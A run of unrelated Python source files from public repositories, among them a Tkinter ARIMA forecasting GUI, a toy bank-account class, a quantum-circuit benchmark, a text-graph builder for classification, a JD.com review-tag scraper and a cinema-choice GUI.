dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) dt.set_index('date',inplace=True) f = Figure(figsize=(5,4),dpi = 100) ax1 = f.add_subplot(111) dt.diff().plot(legend = True,ax=ax1) canvas = FigureCanvasTkAgg(f, self) canvas.draw() canvas.get_tk_widget().pack(anchor="center",expand = True) toolbar = NavigationToolbar2Tk(canvas,self) canvas._tkcanvas.pack(anchor="center",expand = True) self.GraphDrawn == True if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: canvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op4(Frame): """ Fame which handles TimeSeries forecasting which shows an image of the forecasted data against the given data and saves it onto a csv called predictions """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="Analyse time series using arima model") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False """ fuction which plots graph and makes a figure then packing it """ def plot_graph(dt): lf = ttk.Labelframe(self, text='Plot Area') lf.pack() headers = ['date','values'] f = Figure(figsize=(5,4),dpi = 100) ax1 = f.add_subplot(111) dt.plot(legend = True,ax=ax1) canvas = FigureCanvasTkAgg(f, self) self.GraphDrawn = True canvas.draw() canvas.get_tk_widget().pack(anchor="center",expand = True) toolbar = NavigationToolbar2Tk(canvas,self) canvas._tkcanvas.pack(anchor="center") self.GraphDrawn = True def parser(x): try: return datetime.strptime(x, '%Y-%m-%d') ## Attempts to read the data given by using the format yyyy/mm/dd except: return datetime.strptime(x,'%Y-%m') ## Attempts to read the data given by using the format yyyy/mm def forecast(fileAddress): if self.GraphDrawn == False: messagebox.showinfo("Time Series Analysis", "This will take a minute please wait. A file will be output with the prediction on the same location as the program.") series = pd.read_csv(fileAddress, header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser,skiprows = 1) X = series.values size = int(len(X) * 0.6) ## sets the amount of data that is going to be tested (max would be 0.1 min would be 0.9) train, test = X[0:size], X[size:len(X)] ## defines the test data and the data which it will be compared to history = [x for x in train] predictions = list() ### defines a list for which the forecast will be input to for t in range(len(test)): model = ARIMA(history, order=(5,1,0)) ## Runs arima algorithm in order make the model model_fit = model.fit(disp=0) ## Fits the model output = model_fit.forecast() ## Forecasts based on previous data within the window defined by arima yhat = output[0] predictions.append(yhat) obs = test[t] history.append(obs) """ Part of the function which makes a new data fram with the predictions and plots said data frame """ error = mean_squared_error(test, predictions) PredicVals = [] for i in range (int(len(predictions))): PredicVals.append(predictions[i].item()) ##Due to the output of the forecast function being a numpy array in oder for me to plot the graph i have to add them to a list and get the modulous of them headers = ['date','values'] RowsNeedSkip =1+int(len(train)) ##This is to remove the data which is unused for testing dt = read_csv(fileAddress,header = 0, names=headers,skiprows=RowsNeedSkip) #### Imports csv file again but having removed unneeded data dt.insert(2, "Predictions", PredicVals, True) ## inserts data which is needed dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) dt.to_csv('prediction.csv') ### This will save a csv file with the actual and predicted values for the dates plot_graph(dt) elif self.GraphDrawn == True: pass self.opButton = Button(self,text="Time series forecasting using a csv file",command = lambda: forecast(controller.fileAddress)) self.opButton.pack(anchor="n") self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor="s") self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.Unpack_ShowFrame(FileSelection)) self.ChangeFile.pack(anchor="s") self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor="s") app = TimeSeriesAnalysis() app.mainloop()
FernandoLopezC/TSA
base.py
base.py
py
19,718
python
en
code
0
github-code
36
35401057235
class Bank: def __init__(self,name): self.name=name self.balance=0 def deposit(self): amount=int(input(f"Dear {self.name},Enter the amount that to be deposit : ")) self.balance=self.balance+amount print(f"-->{amount} deposited successfully....") print("Dear ",self.name,", Available balance is :",self.balance) def withdraw(self): amount=int(input("Enter the amount that to be withdraw : ")) if self.balance<amount: print(f"Dear {self.name}, Available balance is :{self.balance}") print("your account balance is not possible.......") else: self.balance=self.balance-amount print(f"{amount} withdraw ") print("Dear ",self.name,", Available balance is :",self.balance) def transfer(self,obj): transfer_amount=int(input(f"Dear {self.name},Enter the amount that to be transfer : ")) if(self.balance < transfer_amount): print("not sufficient balace in your account.....") else: self.balance-=transfer_amount obj.balance+=transfer_amount print(f"Amount {transfer_amount} is successfully Transferd from {self.name} account to {obj.name}") print("Dear ",self.name,", Available balance is :",self.balance) def accountbalance(self): print("Dear ",self.name,", Available balance is :",self.balance) account=Bank("pranit") account.deposit() account.withdraw() account.deposit() account1=Bank("om") account1.deposit() account.transfer(account) account1.accountbalance()
PranitRohokale/My-programs
bank account.py
bank account.py
py
1,612
python
en
code
0
github-code
36
15444060214
#!/usr/bin/env python from __future__ import print_function import sys import argparse def parse_stdin(in_file): d = {} for line in in_file: if ':' in line: split = line.split(':') stripped = [s.strip() for s in split] #if len(stripped) > 2: # print 'Warning: ignoring remaining column in line \'', line, '\'' # the split(' ')[0] is mainly to get rid of the ms info in runtime d[stripped[0]] = stripped[1].split(' ')[0] # Something whent wrong if 'reason' in d: if 'time' in d['reason']: d['runtime'] = 'Timeout' else: d['runtime'] = 'N/A' return d def print_data(d, keys): values = [d[key] for key in keys] s = '&'.join(values) s += '\\\\' print(s) if __name__ == '__main__': argument_parser = argparse.ArgumentParser( description=("A program to parse output form the COCP exercises." " Pipe the input from your experiment file into it, " " like so: ./queens | gather_stats.py.")) # Normally, we would save the results but we're not using them now. argument_parser.parse_args() d = parse_stdin(sys.stdin) print_data(d, keys=['runtime', 'failures'])
amandasystems/cocp-automation-2017
conductor/gather_stats.py
gather_stats.py
py
1,288
python
en
code
0
github-code
36
16821571488
# Author: Bill Pengyuan Zhai. Harvard University. Yelin Group. Oct 2022 from Utils_torch_version import Network, get_nn_pairs, binary_basis, unpacknbits import numpy as np import matplotlib.pyplot as plt from scipy import sparse import scipy import scipy.linalg import qiskit import time import torch import math # try another way of evolving # The sparse H_OP is a sparse.csr matrix. Useful for calculating via scipy diagonalization. Does not involve qiskit classes def initialize_sparse(conn_i, conn_j, a, b, c, d): # print('debug a, b, c, d)',(a, b, c, d)) sx = sparse.csr_matrix(np.array([[0., 1.], [1., 0.]])) sy = sparse.csr_matrix(np.array([[0 , -1j], [1j , 0]])) sz = sparse.csr_matrix(np.array([[1., 0.], [0., -1.]])) id = sparse.csr_matrix(np.eye(2)) # A list of single x, y, z operator applied on the site i_site sx_list = [] sy_list = [] sz_list = [] for i_site in range(N): x_ops = [id] * N y_ops = [id] * N z_ops = [id] * N x_ops[i_site] = sx y_ops[i_site] = sy z_ops[i_site] = sz X = x_ops[0] Y = y_ops[0] Z = z_ops[0] for j in range(1, N): X = sparse.kron(X, x_ops[j], 'csr') Y = sparse.kron(Y, y_ops[j], 'csr') Z = sparse.kron(Z, z_ops[j], 'csr') sx_list.append(X) sy_list.append(Y) sz_list.append(Z) # H_zz = sparse.csr_matrix((2**N, 2**N)) # H_xx = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_yy = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_xy = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_yx = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_z = sparse.csr_matrix(np.zeros((2**N, 2**N)),dtype=np.complex128) #H_zzzi = sparse.csr_matrix((2**N, 2**N),dtype=np.complex128) # H_zz = H_zz + sz_list[i] * sz_list[j] H_xx = sx_list[conn_i] @ sx_list[conn_j] H_yy = sy_list[conn_i] @ sy_list[conn_j] H_xy = sx_list[conn_i] @ sy_list[conn_j] H_yx = sy_list[conn_i] @ sx_list[conn_j] H_zzz_id = sparse.csr_matrix(np.eye(2**N), dtype=np.complex128) # This is a diagonal of real numbers for i in range(conn_i, conn_j): H_zzz_id = sz_list[i] @ H_zzz_id H_z = - (a/2) * sz_list[conn_i] - (b/2) * sz_list[conn_j] H = H_z + ( (1.0j*c/2) * H_xy - (1.0j*c/2) * H_yx + (d*(1.0j)/2) * H_xx + (d*(1.0j)/2) * H_yy ) @ H_zzz_id # print('H_z', H_z) # print('H_xy',H_xy) # print('H_yx',H_yx) # print('H_xx',H_xx) # print('H_yy',H_yy) # print('debug H', H) # Somehow this doesn't come out to be Hermitian lol # print('debug iH', 1j* H) return H.todense() Ns = [2,4,6,8] reps = 1 avg_time_at_N_fermion, avg_time_at_N_exact = [], [] q_fidelities_all_runs, TVs_all_runs = [], [] for N in Ns: print('start N: ', N) conn_list = [ [np.min(p), np.max(p)] for p in get_nn_pairs(geometry=(N,))]*3 # zero indexed and should not be periodic (not a closed circle) #conn_list = [[i, N-1] for i in range(N-1)]*2 #conn_list = [[0,1]] # conn_list = [] times_fermion = [] times_exact = [] for rep in range(reps): L = len(conn_list) # Number of layers # initiliaze the circuit circuit = Network(conn_list, N) x = torch.tensor([[1,0]*int(N/2)]) if N%2==0 else torch.tensor([[1,0]*int(N/2)+[1]]) # The 1010101... single basis state x_string = '10'*int(N/2)+'1' if N%2==1 else '10'*int(N/2) init_state_numpy = qiskit.quantum_info.Statevector.from_label(x_string).data # Fix this, the parameters are defined differently now for the pytorch implementation params_m = torch.tensor(math.pi) * torch.rand((L, 4)) print('params_m',params_m) circuit.manual_set_params(params_m) basis_m_n_half = torch.tensor(binary_basis(geometry=(N//2,))) basis_m_n = torch.tensor(binary_basis(geometry=(N,))) probs = torch.zeros(2**(N//2), dtype=torch.cfloat) # amps = torch.zeros(2**(N), dtype=torch.cfloat) ts = time.time() # sums = torch.sum(basis_m_n, axis=1) # print('sums', sums) # diff = sums-torch.sum(x) # a list of differences in the number of Fermions # print('diff', diff) # indices = (diff == 0).nonzero().flatten() # these are the indices where probability can be nonzero # print('indices', indices) # # Prepare the batches n_batches = len(basis_m_n_half)//10 if len(basis_m_n_half)%10 == 0 else len(basis_m_n_half)//10+1 # n_batches = len(basis_m_n)//10 if len(basis_m_n)%10 == 0 else len(basis_m_n)//10+1 for i in range(n_batches): y_batch = basis_m_n_half[10*i : 10*(i+1)] # y_batch = basis_m_n[10*i : 10*(i+1)] x_batch = x.repeat(y_batch.shape[0], 1) # a batch of 10 sub_mask_batch = (torch.tensor([ [1]*(N//2)+[0]*(N//2) ])).repeat(y_batch.shape[0], 1) # Measure the first half # sub_mask_batch = (torch.tensor([ [1]*N ])).repeat(y_batch.shape[0], 1) print('y_batch, x_batch, sub_mask_batch', (y_batch, x_batch, sub_mask_batch)) probs_batch = circuit.forward_partial_observation(y_batch, x_batch, sub_mask_batch) print('debug probs_batch', probs_batch) # Now put these amp_batch values into correct positions probs[10*i : 10*(i+1)] = probs_batch print('probs', probs) probs = probs.detach().numpy() tf = time.time() times_fermion.append(tf - ts) ts = time.time() exp_iH_exact = np.eye(2**N) for l in range(L): conn = conn_list[l] a, b, c, d = params_m.detach().numpy()[l] H_exact = initialize_sparse(conn[0], conn[1], a, b, c, d) exp_iH_exact = (scipy.linalg.expm(-1.0j*H_exact))@exp_iH_exact # 1.0j or -1.0j? state_exact = np.matmul(exp_iH_exact, init_state_numpy[:,None]) tf = time.time() times_exact.append(tf - ts) rho_A = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N//2)]) # rho_A = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N//2, N)]) rho_test = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N-1)]) print('rho_test', rho_test) # rho_A = qiskit.quantum_info.partial_trace(state_exact, []) probs_exact = (np.abs(np.diag(rho_A.data))).squeeze() # probs_exact = (np.abs(state_exact)**2).squeeze() print('rho_A', rho_A) # print('exact evolved state', state_exact) # print('exact evolved prob', probs_exact) probs_fermion = probs # print('fermion state', amps) # print('Fermion probs', probs_fermion) # print('sum Fermion probs', sum(probs_fermion)) plt.plot(probs_exact, '^-') plt.plot(probs_fermion, 'x') plt.legend(['exact probs', 'Fermion_probs']) plt.title('(N, rep)='+str((N, rep))) plt.savefig('img_torch/(N, rep)='+str((N, rep))+'.png') plt.close() # calculate the quantum fidelity #q_fidelity1 = np.abs((np.conjugate(amps).dot(state_exact[:,0])))**2 #print('debug amps', amps) #q_fidelity1 = qiskit.quantum_info.state_fidelity(qiskit.quantum_info.Statevector(amps), rho_A) #fidelity2 = np.abs((np.conjugate(state_exact[:,0]).dot(amps)))**2 #print('q_fidelity', q_fidelity1) print('debug probs_fermion shape', probs_fermion.shape) print('debug probs_exact shape', probs_exact.shape) print('diff', probs_fermion-probs_exact) tv = np.sum(np.abs(probs_fermion-probs_exact)) print('tv', tv) #q_fidelities_all_runs.append(q_fidelity1) TVs_all_runs.append(tv) avg_time_fermion = sum(times_fermion)/reps std_time_fermion = np.std(times_fermion) avg_time_exact = sum(times_exact)/reps std_time_exact = np.std(times_exact) avg_time_at_N_fermion.append(avg_time_fermion) avg_time_at_N_exact.append(avg_time_exact) print('avg_time_at_N_fermion', avg_time_at_N_fermion) print('avg_time_at_N_exact', avg_time_at_N_exact) plt.plot(Ns, avg_time_at_N_fermion) plt.plot(Ns, avg_time_at_N_exact) plt.plot(Ns, avg_time_at_N_fermion+std_time_fermion, '+') plt.plot(Ns, avg_time_at_N_fermion-std_time_fermion, '-') plt.plot(Ns, avg_time_at_N_exact+std_time_exact, '^') plt.plot(Ns, avg_time_at_N_exact-std_time_exact, 'v') plt.legend(['avg_time_at_N_fermion', 'avg_time_at_N_exact']) plt.title('Runtime vs N-qubit sizes') plt.savefig('img/Runtime.png') plt.close() # print('q fidelities_all_runs', q_fidelities_all_runs) # plt.plot(q_fidelities_all_runs) # plt.title('q fidelities at all runs') # plt.savefig('img_torch/q_fidelities.png') print('TVs_all_runs', TVs_all_runs) plt.plot(TVs_all_runs) plt.title('TVs at all runs') plt.savefig('img_torch/TVs.png')
BILLYZZ/NFNet
Benchmark_torch_version_partial.py
Benchmark_torch_version_partial.py
py
9,049
python
en
code
1
github-code
36
42335398411
import warnings import torch from mmdet.core import bbox2result from ..builder import DETECTORS, build_backbone, build_head, build_neck from .base import BaseDetector from .single_stage import SingleStageDetector @DETECTORS.register_module() class TestGtDetector(SingleStageDetector): """Base class for single-stage detectors. Single-stage detectors directly and densely predict bounding boxes on the output features of the backbone+neck. """ def __init__(self, backbone, neck=None, bbox_head=None, train_cfg=None, test_cfg=None, pretrained=None, init_cfg=None): super(TestGtDetector, self).__init__(init_cfg) def simple_test(self, img, img_metas, rescale=False, gt_labels=None, gt_bboxes=None): """Test function without test-time augmentation. Args: img (torch.Tensor): Images with shape (N, C, H, W). img_metas (list[dict]): List of image information. rescale (bool, optional): Whether to rescale the results. Defaults to False. Returns: list[list[np.ndarray]]: BBox results of each image and classes. The outer list corresponds to each image. The inner list corresponds to each class. """ import ipdb ipdb.set_trace() feat = self.extract_feat(img) results_list = self.bbox_head.simple_test( feat, img_metas, rescale=rescale) bbox_results = [ bbox2result(det_bboxes, det_labels, self.bbox_head.num_classes) for det_bboxes, det_labels in results_list ] return bbox_results
mengqiDyangge/HierKD
mmdet/models/detectors/single_stage_test.py
single_stage_test.py
py
1,754
python
en
code
32
github-code
36
43194848130
import pickle as pkl import numpy as np from utils import clean_str import scipy.sparse as sp from tqdm import tqdm from utils import clean_str import torch word_embeddings = dict() with open('glove.840B.300d.txt', 'r') as f: for line in f.readlines(): data = line.split(' ') word_embeddings[str(data[0])] = list(map(float, data[1:])) word_embedding_dim = 300 docs = open("data/mr/mr.clean.txt", 'r') doc_list = docs.readlines() docs.close() # build vocab word_set = set() for doc_words in doc_list: words = doc_words.split() for word in words: word_set.add(word) word_set.add("<pad>") vocab = list(word_set) vocab_size = len(vocab) oov = np.random.uniform(-0.01, 0.01, (vocab_size, word_embedding_dim)) labels = open("data/mr/mr.txt", 'r') label_list = labels.readlines() labels.close() labels = [] for i in range(len(doc_list)): labels.append(clean_str(label_list[i]).split()[-1]) label_set = set(labels) label_set = list(label_set) """ def dependency_adj_matrix(text, window_size=11, weighted_graph=False): # https://spacy.io/docs/usage/processing-text doc_len = len(text) # sliding windows windows = [] if doc_len <= window_size: windows.append(text) for i in range(doc_len - window_size + 1): window = text[i: i + window_size] windows.append(window) word_pair_count = {} for window in windows: for p in range(1, len(window)): for q in range(0, p): word_p = window[p] word_p_id = word_id_map[word_p] word_q = window[q] word_q_id = word_id_map[word_q] if word_p_id == word_q_id: continue word_pair_key = (word_p_id, word_q_id) # word co-occurrences as weights if word_pair_key in word_pair_count: word_pair_count[word_pair_key] += 1. else: word_pair_count[word_pair_key] = 1. # bi-direction word_pair_key = (word_q_id, word_p_id) if word_pair_key in word_pair_count: word_pair_count[word_pair_key] += 1. else: word_pair_count[word_pair_key] = 1. row = [] col = [] weight = [] for key in word_pair_count: p = key[0] q = key[1] row.append(word_id_map[vocab[p]]) col.append(word_id_map[vocab[q]]) weight.append(word_pair_count[key] if weighted_graph else 1.) for key in range(vocab_size): row.append(key) col.append(key) weight.append(1.) adj = sp.csr_matrix((weight, (row, col)), shape=(vocab_size, vocab_size)) adj = adj.tocoo() adj = torch.sparse.FloatTensor(torch.LongTensor([adj.row.tolist(), adj.col.tolist()]), torch.FloatTensor(adj.data.astype(np.float))) # adj = normalize_adj(adj) #matrix = np.zeros((vocab_size, vocab_size)).astype('float32') #for row in range(doc_len): # for tk in range(doc_len): # matrix[row, tk] += adj[word_id_map[orig_doc[row]], word_id_map[orig_doc[tk]]] return adj """ def dependency_adj_matrix(text, max_len, window_size=3, weighted_graph=False): # https://spacy.io/docs/usage/processing-text doc_len = len(text) doc_vocab = list(set(text)) vocab_size = len(doc_vocab) word_ids_map = {} ids_word_map = {} for j in range(vocab_size): word_ids_map[doc_vocab[j]] = j ids_word_map[j] = doc_vocab[j] # sliding windows windows = [] if doc_len <= window_size: windows.append(text) else: for i in range(doc_len - window_size + 1): window = text[i: i + window_size] windows.append(window) word_pair_count = {} for window in windows: for p in range(1, len(window)): for q in range(0, p): word_p = window[p] word_p_id = word_ids_map[word_p] word_q = window[q] word_q_id = word_ids_map[word_q] if word_p_id == word_q_id: continue word_pair_key = (word_p_id, word_q_id) # word co-occurrences as weights if word_pair_key in word_pair_count: word_pair_count[word_pair_key] += 1. else: word_pair_count[word_pair_key] = 1. # bi-direction word_pair_key = (word_q_id, word_p_id) if word_pair_key in word_pair_count: word_pair_count[word_pair_key] += 1. else: word_pair_count[word_pair_key] = 1. row = [] col = [] weight = [] for key in word_pair_count: p = key[0] q = key[1] row.append(word_ids_map[doc_vocab[p]]) col.append(word_ids_map[doc_vocab[q]]) weight.append(word_pair_count[key] if weighted_graph else 1.) for key in range(vocab_size): row.append(key) col.append(key) weight.append(1.) adj = sp.csr_matrix((weight, (row, col)), shape=(vocab_size, vocab_size)) matrix = np.zeros((max_len, max_len)).astype('float32') for row in range(doc_len): for tk in range(doc_len): matrix[row, tk] += adj[word_ids_map[text[row]], word_ids_map[text[tk]]] matrix = normalize_adj(matrix) return matrix def normalize_adj(adj): """Symmetrically normalize adjacency matrix.""" rowsum = np.array(adj.sum(1)) with np.errstate(divide='ignore'): d_inv_sqrt = np.power(rowsum, -0.5).flatten() d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0. d_mat_inv_sqrt = np.diag(d_inv_sqrt) return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt) all_graphs = [] all_labels = [] all_features = [] all_sentences = [] max_seq_len = 35 for i in tqdm(range(len(doc_list))): doc = doc_list[i].lower().strip() # doc = clean_str(doc[0]) + " " + clean_str(doc[1]) doc = doc.split()[:max_seq_len] doc_words = ["<pad>" for _ in range(max_seq_len)] doc_words[:len(doc)] = doc[:] features = [] for key in range(len(doc_words)): if doc_words[key] in word_embeddings: features.append(word_embeddings[doc_words[key]]) else: features.append(oov[vocab.index(doc_words[key]), :]) features = np.array(features) adj_matrix = dependency_adj_matrix(doc, max_len=max_seq_len) one_hot = [0 for l in range(len(label_set))] label_index = label_set.index(labels[i]) one_hot[label_index] = 1 all_features.append(features) all_graphs.append(adj_matrix) all_labels.append(np.array(one_hot)) sentence = [] for k in range(max_seq_len): sentence.append(vocab.index(doc_words[k])) all_sentences.append(sentence) with open("data/mr/mr.all.features", 'wb') as f: pkl.dump(all_features, f) with open("data/mr/mr.all.adj", 'wb') as f: pkl.dump(all_graphs, f) with open("data/mr/mr.all.label", 'wb') as f: pkl.dump(all_labels, f) with open("data/mr/mr.all.sentence", 'wb') as f: pkl.dump(all_sentences, f) with open("data/mr/mr.all.vocab", 'wb') as f: pkl.dump(vocab, f)
MathIsAll/HDGCN-pytorch
build_fixed_graph.py
build_fixed_graph.py
py
7,500
python
en
code
5
github-code
36
41573028205
import logging def get_logger(): """Get logging.""" logging.getLogger('matplotlib.font_manager').setLevel(logging.WARNING) logger = logging.getLogger() logger.setLevel(logging.DEBUG) formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s: - %(message)s', datefmt='%Y-%m-%d %H:%M:%S') ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) ch.setFormatter(formatter) logger.addHandler(ch) return logger
TitusWjt/class3
utils/log.py
log.py
py
474
python
en
code
0
github-code
36
20420839973
# -*- coding: utf-8 -*- from threading import Thread import queue import json import os , sys #导入requests库(请求和页面抓取) import requests #导入time库(设置抓取Sleep时间) import time #导入random库(生成乱序随机数) import random #导入正则库(从页面代码中提取信息) import re #导入数值计算库(常规计算) import numpy as np from PIL import Image from wordcloud import WordCloud #导入科学计算库(拼表及各种分析汇总) import pandas as pd #导入绘制图表库(数据可视化) import matplotlib.pyplot as plt #导入结巴分词库(分词) import jieba as jb #导入结巴分词(关键词提取) import jieba.analyse f=open("rest_idx.txt", 'r') #设置请求中头文件的信息 headers = {'User-Agent':'Mozilla/5.0 ' '(Windows NT 10.0; Win64; x64) ' 'AppleWebKit/537.36 (KHTML,' ' like Gecko) Chrome/76.0.3809.132 ' 'Safari/537.36', #'Accept':'text/html;q=0.9,*/*;q=0.8', #'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3', #"Accept-Language": "zh-CN,zh;q=0.9", #'Connection':'close', 'Referer':'https://www.jd.com/' } q = queue.Queue() NUM = 5 JOBS = 10 #cookies=*** def crawl_jd_cmt_tag(prdtId):# change for url url=r"https://sclub.jd.com/comment/" \ r"productPageComments.action?callback=fetchJSON_comment98vv106813&" \ r"productId={}&" \ r"score=0&sortType=5&page=0&pageSize=10&isShadowSku=0&fold=1".format(prdtId) comment_tag_path = r'C:\TC-prog\JetBrain_pycharm_TC' \ r'\PycharmProjects\Crawler_EEFinal' \ r'\jd_cmt_tags\httpsitem.jd.com{}.html.txt'.format(prdtId) try: r=requests.get(url,headers=headers,timeout=5) r.raise_for_status() except: print ('爬取失败') raw = r.text[:] pos = 0 for i in range(len(raw)): if raw[i] == '(': pos = i try: # data0 = re.sub(u'^fetchJSON_comment98vv106813\(', '', html) r_json_str = r.text[pos + 1:-2] # print (r_json_str) r_json_obj=json.loads(r_json_str,strict=False) print (r_json_obj) r_json_tags=r_json_obj['hotCommentTagStatistics'] print ('狗东评论标签:') # 追加模式,逐行写入 for r_json_tag in r_json_tags: with open(comment_tag_path,'a+') as file: file.write(r_json_tag['name']+ '\t'+str(r_json_tag['count'])+'\n') print(r_json_tag['name']+ '\t'+str(r_json_tag['count'])) except: print('failed') def run(): global f for line in f.readlines(): try: pp = line.split('\t') webpage = pp[1].strip('\n') print(webpage) temp = webpage[14:-5] pos = 0 for i in range(len(temp)): if temp[i] == 'm': pos = i itemID = temp[pos + 1:] if (len(webpage) > 35): continue crawl_jd_cmt_tag(itemID) time.sleep(random.random() * 3) except: print("Invalid Input!") def working(): while True: #arguments = q.get() run() q.task_done() #fork NUM个线程等待队列 for i in range(NUM): t = Thread(target=working) t.setDaemon(True) t.start() #把JOBS排入队列 for i in range(JOBS): q.put(i) #阻塞,等待所有JOBS完成 q.join() f.close()
ltzone/EE208Lab
jd_cmt_tags/_jd_cmt_TAGS.py
_jd_cmt_TAGS.py
py
3,546
python
en
code
0
github-code
36
23258044940
import tensorflow as tf import numpy as np sess = tf.Session() X = tf.placeholder(tf.float32, shape=(100, 3)) y = tf.placeholder(tf.float32, shape=(100)) beta = tf.placeholder(tf.float32, shape=(3)) p = tf.math.sigmoid(tf.tensordot(X, beta, 1)) Loss = -tf.math.reduce_sum(y * tf.math.log(p) + ((1. - y) * tf.math.log(1.-p))) dL = tf.gradients(Loss, beta) ddL = tf.hessians(Loss, beta) rand_X = np.random.uniform(-1, 1, (100,3)) rand_y = np.random.randint(0, 2, 100) rand_beta = np.random.uniform(-1, 1, 3) print(sess.run([Loss, dL, ddL], feed_dict={beta: rand_beta, X: rand_X, y: rand_y})) writer = tf.summary.FileWriter('logs', sess.graph) writer.close() def numpy_equations(X, beta, y): p = 1. / (1. + np.exp(-np.dot(X, beta))) L = -np.sum(y * np.log(p) + ((1. - y) * np.log(1.-p))) dL = np.dot(X.T, p - y) W = np.identity(X.shape[0]) * p * (1. - p) ddL = np.dot(X.T, np.dot(W, X)) return L, dL, ddL print(numpy_equations(rand_X, rand_beta, rand_y))
MarcToussaint/AI-lectures
MachineLearning/nn-exercise/getting_started.py
getting_started.py
py
987
python
en
code
67
github-code
36
34601010887
# Implement the function unique_in_order which takes as argument a sequence and returns a list of items without any elements with the same value next to each other and preserving the original order of elements. # For example: # unique_in_order('AAAABBBCCDAABBB') == ['A', 'B', 'C', 'D', 'A', 'B'] # unique_in_order('ABBCcAD') == ['A', 'B', 'C', 'c', 'A', 'D'] # unique_in_order([1,2,2,3,3]) == [1,2,3] def unique_in_order(iterable): # create a list with the results solution_list = [] # for i in iterable: if len(solution_list) < 1 or not i == solution_list[len(solution_list) - 1]: solution_list.append(i) return solution_list print(unique_in_order('aAAabCCcdeFFgH'))
raqune89/CodeWars
Unique In Order.py
Unique In Order.py
py
738
python
en
code
0
github-code
36
38715815112
#!/usr/bin/env python3 pad = ( (None, None, '1', None, None), (None, '2', '3', '4', None), ('5', '6', '7', '8', '9'), (None, 'A', 'B', 'C', None), (None, None, 'D', None, None) ) row = 2 col = 0 combo = [] with open('input.txt', 'r') as f: for line in f: for c in line.strip(): if c == 'U': new_row = max(0, row - 1) if pad[new_row][col] is not None: row = new_row elif c == 'D': new_row = min(4, row + 1) if pad[new_row][col] is not None: row = new_row elif c == 'L': new_col = max(0, col - 1) if pad[row][new_col] is not None: col = new_col elif c == 'R': new_col = min(4, col + 1) if pad[row][new_col] is not None: col = new_col combo.append(pad[row][col]) print(''.join(combo))
lvaughn/advent
2016/2/combo_lock_2.py
combo_lock_2.py
py
981
python
en
code
1
github-code
36
74329032423
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import django.utils.timezone import django_extensions.db.fields class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='Station', fields=[ ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')), ('created', django_extensions.db.fields.CreationDateTimeField(blank=True, verbose_name='created', editable=False, default=django.utils.timezone.now)), ('modified', django_extensions.db.fields.ModificationDateTimeField(blank=True, verbose_name='modified', editable=False, default=django.utils.timezone.now)), ('name', models.TextField()), ], options={ 'ordering': ('-modified', '-created'), 'get_latest_by': 'modified', 'abstract': False, }, ), ]
opendata-stuttgart/metaEFA
meta_efa/main/migrations/0001_initial.py
0001_initial.py
py
1,045
python
en
code
33
github-code
36
4656654500
__author__ = 'Giuliano' import tkinter as tk from tkinter import * root = tk.Tk() root.geometry("400x650") root.configure(background='orange') class Application(tk.Frame): def __init__(self, master=None): tk.Frame.__init__(self, master) self.configure(background='orange') self.pack() self.check_in_Film1() self.check_in_Film2() self.check_in_Film3() self.check_in_Film4() self.check_in_Film5() self.check_in_Film6() w = 400 h = 650 ws = root.winfo_screenwidth() hs = root.winfo_screenheight() x = (ws/2) - (w/2) y = (hs/2) - (h/2) root.geometry('%dx%d+%d+%d' % (w, h, x, y)) def check_in_Film1(self): self.check_in = tk.Button(self) self.check_in["text"] = "The Martian" self.check_in["command"] = self.say_choice_film1 self.check_in.pack(side="top") def check_in_Film2(self): self.check_in = tk.Button(self) self.check_in["text"] = "Star Wars" self.check_in["command"] = self.say_choice_film2 self.check_in.pack(side="top") def check_in_Film3(self): self.check_in = tk.Button(self) self.check_in["text"] = "007: Spectre" self.check_in["command"] = self.say_choice_film3 self.check_in.pack(side="top") def check_in_Film4(self): self.check_in = tk.Button(self) self.check_in["text"] = "Lord of the Rings: The Fellowship" self.check_in["command"] = self.say_choice_film4 self.check_in.pack(side="top") def check_in_Film5(self): self.check_in = tk.Button(self) self.check_in["text"] = "Kill Bill 2" self.check_in["command"] = self.say_choice_film5 self.check_in.pack(side="top") def check_in_Film6(self): self.check_in = tk.Button(self) self.check_in["text"] = "The Ring" self.check_in["command"] = self.say_choice_film6 self.check_in.pack(side="top") self.QUIT = tk.Button(self, text="QUIT", fg="red", command=root.destroy) self.QUIT.pack(side="bottom") self.QUIT.place(x=0, y=0) def say_choice_film1(self): root.configure(background="yellow") print("U heeft gekozen voor The Martian") def say_choice_film2(self): root.configure(background="black") print("U heeft gekozen 